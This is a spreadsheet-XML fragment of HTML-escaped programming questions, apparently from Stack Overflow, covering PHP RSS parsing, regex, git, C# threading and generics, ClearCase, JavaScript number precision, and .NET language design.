    <t xml:space="preserve">&lt;p&gt;I need to get access to the iTunes tags in an RSS feed using PHP. I've used simplepie before for podcast feeds, but I'm not sure how to get the iTunes tags using it. Is there a way to use simplepie to do it or is there a better way?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Okay I tried Simple XML.&lt;/p&gt;
&lt;p&gt;All this (the code below) seems to work&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$feed = simplexml_load_file('http://sbhosting.com/feed/');
$channel = $feed-&amp;gt;channel;
$channel_itunes = $channel-&amp;gt;children('http://www.itunes.com/dtds/podcast-1.0.dtd');
$summary = $channel_itunes-&amp;gt;summary;
$subtitle = $channel_itunes-&amp;gt;subtitle;
$category = $channel_itunes-&amp;gt;category;
$owner = $channel_itunes-&amp;gt;owner-&amp;gt;name;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I need to get the itunes categories. The seem to be represented in several ways.
In this case I get the follow XML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;itunes:category text="Technology"/&amp;gt;
&amp;lt;itunes:category text="Technology"&amp;gt;
  &amp;lt;itunes:category text="Software How-To"/&amp;gt;
&amp;lt;/itunes:category&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would expect to be able to get the category with something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$category_text = $channel_itunes-&amp;gt;category['text'];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that does not seem to work.&lt;/p&gt;
&lt;p&gt;I've seen other ways to represent the category that I really don't know who to get.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;Technology
  Business
  Education&lt;/p&gt;
&lt;p&gt;Is this a media thing or a itunes thing or both?&lt;/p&gt;
&lt;p&gt;Thanks For Your Help.
G&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is fastest in PHP- MySQL or MySQLi?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to know if anyone has any first-hand experience with this dichotomy. A few blogs say the mysql extension is faster than mysqli.  Is this true?&lt;/p&gt;
&lt;p&gt;And I'm only asking about speed.  I know mysqli has features that are not present in the older extension.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RegEx: Grabbing values between quotation marks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a value like this:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;"Foo Bar" "Another Value" something else
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What regex will return the values enclosed in the quotation marks (e.g. &lt;code&gt;Foo Bar&lt;/code&gt; and &lt;code&gt;Another Value&lt;/code&gt;)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting 256 colors out of ruby-ncurses</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got 256 colors working great in my terminal (&lt;a href="http://www.frexx.de/xterm-256-notes/"&gt;test scripts here&lt;/a&gt;), but it stops working when I use ncurses (via Ruby-ncurses). Printing the escape sequences given on that page works fine, but when I initialize ncurses 'puts' stops working and I can't output the colors with any of the various ncurses color changing/string output functions I've found. What gives?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to track page views</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a e-commerce system and I would like to track the product page views, but I'm not sure of the best way to do that... My boss suggested that I should count one view for the first time a user opens a product page and then store a cookie saying it was already viewed, but what if the user doesn't accept cookies? Another option would be to store the user's IP address, but what if a lot of different users in the same company opens the product pages? Just one view would be counted?&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
&lt;p&gt;thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find out which remote branch a local branch is tracking</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;See also:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/4950725/how-do-i-get-git-to-show-me-which-branches-are-tracking-what"&gt;how do I get git to show me which branches are tracking what?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How can I find out which remote branch a local branch is tracking?&lt;/p&gt;
&lt;p&gt;Do I need to parse git config output, or is there a command that would do this for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to deploy an already built Drupal site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a Drupal newbie. Is it possible to set up everything and deploy Drupal on the server? I mean things like putting in the content, setting up the modules, etc..., then you put it all up to the production server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Coming up to speed on the programming environment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not a full-time software guy.  In fact, in the last ten years, 90 % of my work was either on the hardware or doing low-level (embedded) code.&lt;/p&gt;
&lt;p&gt;But the other 10% involves writing shell scripts for development tools, making kernel changes to add special features, and writing GUI applications for end-users.&lt;/p&gt;
&lt;p&gt;The problem is that I find myself facing significant holes in my knowledge, often because it's been years since I've done "X", and I've either forgotten, or the environment has changed.&lt;/p&gt;
&lt;p&gt;Every so often, there are threads on TheDailyWTF.com along the lines of "WTF: the guy spent all day writing tons of code, when he could have called foobar() in library baz".  I've been there myself, because I don't remember much beyond the #include &amp;lt;stdio.h&amp;gt; stuff (for example), and my quick search somehow missed the right library.&lt;/p&gt;
&lt;p&gt;What methods have you found effective to crash-learn and/or crash-refresh yourself in programming environments that you rarely touch?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Greasemonkey: love it or hate it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As users, we love the power of Greasemonkey. As developers, it can complicate things.&lt;/p&gt;
&lt;p&gt;Some &lt;a href="http://dean.edwards.name/weblog/2005/03/ungreased/" rel="nofollow"&gt;people&lt;/a&gt; advocate defensively disabling user scripts; others are willing to die to defend them.&lt;/p&gt;
&lt;p&gt;Is there a middle ground? How can we reduce the threat of an evolutionary arms race between users and unscrupulous advertisers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Making locking easier in MTAs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In multi-threaded code, when an instance may be read or written by multiple threads, they need to be locked on to perform these operations safely.&lt;/p&gt;
&lt;p&gt;To avoid the repetition of creating an object to lock on and writing a bunch of lock statements through code, I've created a generic class to handle the locking. &lt;/p&gt;
&lt;p&gt;Am I missing anything, conceptually? This should work, right?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Locked&amp;lt;T&amp;gt; where T : new()
{
    private readonly object locker = new object();
    private T value;
    public Locked()
        : this(default(T))
    { }
    public Locked(T value)
    {
        this.value = value;
    }
    public T Get()
    {
        lock (this.locker)
        {
            return this.value;
        }
    }
    public void Set(T value)
    {
        lock (this.locker)
        {
            this.value = value;
        }
    }    
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And an example of it being used in a class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private Locked&amp;lt;bool&amp;gt; stopWorkerThread = new Locked&amp;lt;bool&amp;gt;();
public void WorkerThreadEntryPoint()
{
    while (true)
    {
        if (this.stopWorkerThread.Get())
        {
            break;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, how would I test something like this, in an automated way (e.g. create a unit test)?&lt;/p&gt;
&lt;p&gt;Lastly, what can I do to implement a ++ and -- operator, to avoid this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        this.runningThreads.Set(this.runningThreads.Get() + 1);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Interface "recursion" and reference counting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small problem with interfaces. Here it is in Pseudo code :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type
  Interface1 = interface
  end;
  Interface2 = interface
  end;
  TParentClass = class(TInterfacedObject, Interface1)
  private
    fChild : Interface2;
  public
    procedure AddChild(aChild : Interface2);
  end;
  TChildClass = class(TInterfacedObject, Interface2)
  private
    fParent : Interface2;
  public
    constructor Create(aPArent : Interface1);
  end;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone see the flaw? I need the child to have a reference to it's parent, but the reference counting doesn't work in this situation. If I create a ParentClass instance, and add a child, then the parent class is never released. I can see why. How do I get round it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Double buffer child controls in custom control (C#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to double buffer a custom control which contains buttons.  I have tried various ways to double buffer the control; SetStyle, BufferedGraphicsContext, and drawing to a bitmap.  These all work fine for the custom drawing of the control, but none of them handle drawing the button to a back buffer. How do I achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem using the ASP.NET FileUpload control in an UpdatePanel?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running into an issue where I have a FileUpload control in an UpdatePanel.  When I attempt to save changes and upload the file, no file is found.  If I remove the UpdatePanel everything seems to work fine.  &lt;/p&gt;
&lt;p&gt;Any ideas why this might be happening?  And is there a work-around?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3086/2914877750_0a68e10ffd.jpg?v=0" alt="Screenshot" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I find the method that called the current method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When logging in C#, how can I learn the name of the method that called the current method? I know all about &lt;code&gt;System.Reflection.MethodBase.GetCurrentMethod()&lt;/code&gt;, but I want to go one step beneath this in the stack trace. I've considered parsing the stack trace, but I am hoping to find a cleaner more explicit way, something like &lt;code&gt;Assembly.GetCallingAssembly()&lt;/code&gt; but for methods.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you develop against OpenID locally</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a website (in Django) that uses OpenID to authenticate users. As I'm currently only running on my local machine I can't authenticate using one of the OpenID providers on the web. So I figure I need to run a local OpenID server that simply lets me type in a username and then passes that back to my main app.&lt;/p&gt;
&lt;p&gt;Does such an OpenID dev server exist? Is this the best way to go about it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GPSID - Poll Driver V2.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On the page
&lt;a href="http://msdn.microsoft.com/en-us/library/bb202066.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/bb202066.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If references something called "POLL Driver V2" however this is the only 
place I can see that talks about this.  I'm extermely interested in the 
&lt;code&gt;GPSSetDeviceParam: GPS_QUERY_FIX&lt;/code&gt; call but after searching for about 2 hours 
on this, I couldn't find any information.&lt;/p&gt;
&lt;p&gt;Can someone point me in the right direction on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does FileSystemWatcher create multiple change events when I copy a file to the directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written a small test application using the .Net FileSystemWatcher to keep an eye on a directory. When I copy a large-ish (a few Mb) file into that directory I get the following events listed (see screenshot - and ignore the Delete event to begin with).&lt;/p&gt;
&lt;p&gt;&lt;img src="http://robinwilson.homelinux.com/FSW.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;I get a created event (as expected), but then two changed events (about 0.7 seconds apart). Why is this? This would cause major problems in the application I am planning to develop - as I'd try and do things with the file twice (presumably once before it has finished being written to!). Is there anything I can do to stop this happening? From what I've read on StackOverflow and elsewhere, you should just get one changed event once the file has been changed and then closed. Why am I getting two?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I elegantly print the date in RFC822 format in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I elegantly print the date in RFC822 format in Perl?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove paths from tabs in Visual Studio 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to stop the path showing in a source code tab in Visual Studio 2008?&lt;/p&gt;
&lt;p&gt;Currently when developing an ASP.NET site, I get the path from the root plus the filename - truncated when it gets too long. So something like:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;MyDir/MyPage.aspx&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;for a short path and filename, or:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;MyDir/MyLong...yPage.aspx&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;for a longer path and filename.&lt;/p&gt;
&lt;p&gt;I'd prefer to see just the filename (ie just MyPage.aspx), allowing more tabs to show at once and making it easier to see which files I have open without using the drop-down list or Crtl-Tab to show the full set.&lt;/p&gt;
&lt;p&gt;In VS2005, I just get the filename - no path however long it is. Oddly in VS2003 I get the path and filename. I've scoured the options and I can't find a setting that lets me change what appears in the tabs. Searching suggests that other people have similar issues (although which version it occurs in appears to differ) but no-one could identify an option to change what appears.&lt;/p&gt;
&lt;p&gt;Can anyone point me in the right direction to get rid of the paths in the tabs (or confirm that it can't be changed to save me wasting more time searching)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the state of the art user interface for browsing complex version control system history?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using Mercurial I sometimes find that it is hard to understand the relationship between changesets when there are thousands of changesets, and sometimes ten or more active branches at any one time.  Currently, I use &lt;a href="http://www.logilab.org/project/hgview/screenshots?selected=4873"&gt;hgview&lt;/a&gt; which is okay, and while it makes a reasonable attempt to represent the parent relationships it is still basically one dimensional. I imagine something making use of graph visualisation programs such as &lt;a href="http://www.graphviz.org/"&gt;GraphViz&lt;/a&gt; might work nicely, or perhaps something more wacky.&lt;/p&gt;
&lt;p&gt;Currently I'm working on projects with around 30,000 revisions, and I expect that number to grow significantly; if 100 full time developers really grok distributed version control and start committing regularly and sharing their full development history then we could end up dealing with millions of revisions. A browser which doesn't have to load the entire history in to RAM every time you want to look at it therefore becomes necessary&lt;/p&gt;
&lt;p&gt;I'm interested in good history browsers for any version control systems as well, especially if there is a chance I can port them to Mercurial.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Same class, different namespaces, a way to simplify?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with a webservice that offers almost duplicated code across two namesspaces.  Lets say for example PigFeet and HorseFeet, both namespaces contain a Feet class and other code that works with the Feet class requires it to be part of that same namespace.&lt;/p&gt;
&lt;p&gt;Right now In my code I'm forced to do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if( _animalType == AnimalType.Pig )
{ 
     //namespace is pigfeet
     PigFeet.Feet feet = new Feet();
     feet.WashFeet();
}
if( _animalType == AnimalType.Horse )
{
     //namespace is horsefeet
     HorseFeet.Feet feet = new Feet();
     feet.WashFeet();
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is leaving me with lots of duplicated code.  Is there a way to choose a namespace more dynamically?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.net Project Ideas?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently decided to step-up my knowledge in ASP.NET (I haven't coded in ASP.NET for about 2 years or so, and much has changed since then).
I want to work with the new MVC framework, try jQuery, LINQ to SQL and basically just to catch up with most of the up-to-date features.&lt;/p&gt;
&lt;p&gt;To do that, I want to start a nice project in ASP.NET, a serious web application from scratch with the MVC framework.
My only problem is.. what should I build? I hate to code stuff that already exist on the web and I just want to make some nice web application (If it's something useful I might publish it like stuff such as Stackoverflow.com ;) or just share its source.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to track third-party sources with ClearCase without a headache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First of all: I am not an experienced ClearCase user, but I have lots of experience with other VCS and *nix command-line tools. WIth ClearCase, I use command-line tool ("cleartool") working in a Unix shell.&lt;/p&gt;
&lt;p&gt;Problem: I have a small set of sources stored in the ClearCase. Once in a while a fresh .tgz with the same sources comes in and I have to update sources in the repository (process could not be changed so that other party will use ClearCase).&lt;/p&gt;
&lt;p&gt;Now I do the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Extract tgz into, say, "~/new_src"&lt;/li&gt;
&lt;li&gt;"ct setview ..." and cd to the place where the sources are (say, "/vobs/src")&lt;/li&gt;
&lt;li&gt;I compare the sources with "diff -Naurb . ~/new_src", examine diff's output and:
&lt;ol&gt;
&lt;li&gt;Copy new files to the /vobs/src and do "cleartool mkelem" on them&lt;/li&gt;
&lt;li&gt;Checkout changed files, copy new sources over and commit them&lt;/li&gt;
&lt;li&gt;Do "cleartool mkdir" for new dirs and populate them&lt;/li&gt;
&lt;/ol&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This process is slowly driving me crazy since in almost any other version control system I would just checkout the sources, copy new sources over, examine diffs, add new files and then commit the whole lot. Or, better yet, use tags/branches, though they are really not needed in this case - I need to have an up-to-date version of the sources in the repo, that's all.&lt;/p&gt;
&lt;p&gt;I tried to checkout everything (using "cleartool co -nc &lt;code&gt;find .&lt;/code&gt;"), copy new sources over, and commit changed files/add new files afterward. But this requires parsing of the "cleartool ls" output and is even messier.&lt;/p&gt;
&lt;p&gt;I could miss something obvious, but several forays into Google tell me that I'm not. However, I'd like to hear it from ClearCase powerusers - is there any hope for clueless like me or not? :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Typing generic values (C#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I try this with a generic class where this.value is T:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (this.value.GetType() == typeof(int))
{
    ((int)this.value)++;
}
else
{
    throw new InvalidOperationException
            ("T must be an int to perform this operation");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get a compile-time error: "Cannot convert type 'T' to 'int'"&lt;/p&gt;
&lt;p&gt;What should I do to perform an integral operation on this.value when it's an int?&lt;/p&gt;
&lt;p&gt;Note that this is just an example. The code does type conversions with generics, and "int" is just an example of one type for T. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Speeding Up Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is really two questions, but they are so similar, and to keep it simple, I figured I'd just roll them together:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Firstly&lt;/strong&gt;: Given an established python project, what are some decent ways to speed it up beyond just plain in-code optimization?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Secondly&lt;/strong&gt;:  When writing a program from scratch in python, what are some good ways to greatly improve performance?&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For the first question, imagine you are handed a decently written project and you need to improve performance, but you can't seem to get much of a gain through refactoring/optimization.  What would you do to speed it up in this case short of rewriting it in something like C?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add (external) relationship (tagging) to existing Hibernate entities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to add a new many-to-many relationship to an existing Hibernate entity.
I do not want to touch the original Hibernate entity bean or its configuration.
What I am adding is a "tagging" feature that can be viewed as an external contribution and not part of the entity's data itself.&lt;/p&gt;
&lt;p&gt;I want to have a simple join table with only two columns, the entity primary key, and the tag id.&lt;/p&gt;
&lt;p&gt;Can I use Hibernate to manage this table without introducting a new (artificial) entity type that contains a single tag mapping?&lt;/p&gt;
&lt;p&gt;Or am I misguided and should actually want to have this "relationship-entity", so that I can add attributes (such as timestamps) later?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can anyone think of some good reasons *not* to use an Object-Oriented DBMS to back a website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say you're coding some kind of web application. Something where people can contribute content, e.g. a simple photo-sharing site.&lt;/p&gt;
&lt;p&gt;How many good reasons can you think of to &lt;em&gt;not&lt;/em&gt; go with an object-oriented database (e.g. db4o)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2.9999999999999999 &gt;&gt; .5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I heard that you could right-shift a number by .5 instead of using Math.floor(). I decided to check its limits to make sure that it was a suitable replacement, so I checked the following values and got the following results in Google Chrome:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
2.5 &gt;&gt; .5 == 2;
2.9999 &gt;&gt; .5 == 2;
2.999999999999999 &gt;&gt; .5 == 2;  // 15 9s
2.9999999999999999 &gt;&gt; .5 == 3;  // 16 9s
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After some fiddling, I found out that the highest possible value of two which, when right-shifted by .5, would yield 2 is 2.9999999999999997779553950749686919152736663818359374999999Â¯ (with the 9 repeating) in Chrome and Firefox. The number is  2.9999999999999997779Â¯ in IE.&lt;/p&gt;
&lt;p&gt;My question is: what is the significance of the number .0000000000000007779553950749686919152736663818359374? It's a very strange number and it really piqued my curiosity.&lt;/p&gt;
&lt;p&gt;I've been trying to find an answer or at least some kind of pattern, but I think my problem lies in the fact that I really don't understand the bitwise operation. I understand the idea in principle, but shifting a bit sequence by .5 doesn't make any sense at all to me. Any help is appreciated.&lt;/p&gt;
&lt;p&gt;For the record, the weird digit sequence changes with 2^x. The highest possible values of the following numbers that still truncate properly:&lt;/p&gt;
&lt;pre&gt;
for 0: 0.9999999999999999444888487687421729788184165954589843749Â¯
for 1: 1.9999999999999999888977697537484345957636833190917968749Â¯
for 2-3: x+.99999999999999977795539507496869191527366638183593749Â¯
for 4-7: x+.9999999999999995559107901499373838305473327636718749Â¯
for 8-15: x+.999999999999999111821580299874767661094665527343749Â¯
...and so forth
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C# .NET 3.0/3.5 features in 2.0 using Visual Studio 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some of the new features that can be used in .NET 2.0 that are specific to C# 3.0/3.5 after upgrading to Visual Studio 2008? Also, what are some of the features that aren't available?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Available&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Lambdas&lt;/li&gt;
&lt;li&gt;Extension methods (by declaring an empty System.Runtime.CompilerServices.ExtensionAttribute)&lt;/li&gt;
&lt;li&gt;Automatic properties&lt;/li&gt;
&lt;li&gt;Object initializers&lt;/li&gt;
&lt;li&gt;Collection Initializers&lt;/li&gt;
&lt;li&gt;LINQ to Objects (by implementing IEnumerable extension methods, see &lt;a href="http://www.albahari.com/nutshell/linqbridge.aspx" rel="nofollow"&gt;LinqBridge&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Not Available&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Expression trees&lt;/li&gt;
&lt;li&gt;WPF/Silverlight Libraries&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Apache POI HWPF - Output a table to Microsoft Word</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been Googling for quite awhile and haven't found a definitive answer.  Is it possible to output a table using Apache POI?  It looks like it hasn't been implemented, since the main developer stopped working on it like 5 years ago.&lt;/p&gt;
&lt;p&gt;Is there an open source alternative to POI that can do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>python dictionary update method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list string tag.&lt;/p&gt;
&lt;p&gt;I am trying to initialize a dictionary with the key as the tag string and values as the array index.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for i, ithTag in enumerate(tag):
    tagDict.update(ithTag=i)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above returns me {'ithTag': 608}  &lt;em&gt;608 is the 608th index&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;My problem is that while the i is being interpreted as a variable, Python is treating the "ithTag" as a string instead of a variable.&lt;/p&gt;
&lt;p&gt;I'm confused, it is kind of hard to google these kind of specific questions.  I hope I worded the title of this question correctly,&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if PHP array is associative or sequential?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;PHP treats all arrays as associative, so there aren't any built in functions. Can anyone recommend a fairly efficient way to check if an array contains only numeric keys?&lt;/p&gt;
&lt;p&gt;Basically, I want to be able to differentiate between this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$sequentialArray = array('apple', 'orange', 'tomato', 'carrot');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$assocArray = array('fruit1' =&amp;gt; 'apple', 
                    'fruit2' =&amp;gt; 'orange', 
                    'veg1' =&amp;gt; 'tomato', 
                    'veg2' =&amp;gt; 'carrot');
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>MinGW library converted to Windows library gives odd link in VC++6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I used the MinGW &lt;code&gt;.a&lt;/code&gt; to Windows &lt;code&gt;.lib&lt;/code&gt; transformation process as detailed in a
thread on the gmp-discuss list, as below (acting against a library created with --disable-shared --enable-static.) &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cp libgmp.a gmp.a
ranlib gmp.a
mv gmp.a gmp.lib
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I now have a &lt;code&gt;.lib&lt;/code&gt; file against which VC++6 seems to have no difficulty linking. What concerns me now is warning messages I'm getting from the link phase:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LINK : warning LNK4049: locally defined symbol "___mb_cur_max" imported
LINK : warning LNK4049: locally defined symbol "__pctype" imported
LINK : warning LNK4049: locally defined symbol "__iob" imported
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At this point in the proceedings these make no difference to the running of
my DLL (which wraps certain GMP functionality). But is that good enough?
Will having these three symbols from &lt;code&gt;libgmp.a&lt;/code&gt; linked in to my Windows DLL
end up biting me later on? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I change the 259 char limit inside WinForms Treeview LabelEdit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My VB.Net Winforms app is a tool to allow hierarchical data to be edited in a tree, then stored in a database. I am using a treeview control.&lt;/p&gt;
&lt;p&gt;Content is drag-dropped from other documents onto the treenodes, or the nodes can be edited directly.&lt;/p&gt;
&lt;p&gt;if I edit the database field directly, and enter a bit of content (a thousand characters long or more!), the treeview will happily display it.. but, when I drag drop, the data is being truncated at 259 characters. If I edit directly, the maximum edit 'window' is also 259 characters. &lt;/p&gt;
&lt;p&gt;259 seems like a really strange number to stop at, so I am wondering - where does this size come from, and can I change it programmatically?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flush disk write cache</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When the policy for a disk in Windows XP and Vista is set to enable write caching on the hard disk, is there a way to flush a file that has just been written, and ensure that it has been committed to disk?&lt;/p&gt;
&lt;p&gt;I want to do this programmatically in C++.&lt;/p&gt;
&lt;p&gt;Closing the file does perform a flush at the application level, but not at the operating system level.  If the power is removed from the PC after closing the file, but before the operating system has flushed the disk write cache, the file is lost, even though it was closed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is there no RAII in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Being primarily a C++ developer the absence of &lt;a href="http://en.wikipedia.org/wiki/Resource_acquisition_is_initialization"&gt;RAII (Resource Acquisition Is Initialization)&lt;/a&gt; in Java and .NET has always bothered me. The fact that the onus of cleaning up is moved from the class writer to its consumer (by means of &lt;code&gt;try finally&lt;/code&gt; or .NET's &lt;a href="http://blogs.msdn.com/cyrusn/archive/2005/05/10/415956.aspx"&gt;&lt;code&gt;using&lt;/code&gt; construct&lt;/a&gt;) seems to be markedly inferior.&lt;/p&gt;
&lt;p&gt;I see why in Java there is no support for RAII since all objects are located on the heap and the garbage collector inherently doesn't support deterministic destruction, but in .NET with the introduction of value-types (&lt;code&gt;struct&lt;/code&gt;) we have the (seemingly) perfect candidate for RAII. A value type that's created on the stack has a well defined scope and C++ destructor semantics can be used. However the CLR does not permit a value-type to have a destructor.&lt;/p&gt;
&lt;p&gt;My random searches found one argument that if a value-type is &lt;a href="http://www.csharphelp.com/archives/archive100.html"&gt;boxed&lt;/a&gt; it falls under the jurisdiction of the garbage collector and therefore its destruction becomes non-deterministic. 
I feel that this argument isn't strong enough, the benefits of RAII are big enough to say that a value-type with a destructor cannot be boxed (or used as a class member).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To cut a long story short my question is&lt;/strong&gt;: are there any other reasons value types can not be used in order to introduce RAII to .NET?  (or do you think my argument about RAII's obvious advantages are flawed?)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I must have not phrased the question clearly since the first four answers have missed the point. I &lt;em&gt;know&lt;/em&gt; about &lt;code&gt;Finalize&lt;/code&gt; and its non-deterministic characteristics, I know about the &lt;code&gt;using&lt;/code&gt; construct and I feel these two options are inferior to RAII. &lt;code&gt;using&lt;/code&gt; is one more thing the consumer of a class must remember (how many people forgot to put a &lt;code&gt;StreamReader&lt;/code&gt; in a &lt;code&gt;using&lt;/code&gt; block?). My question is a philosophical one about the language design, why is it the way it is and can it be improved?&lt;/p&gt;
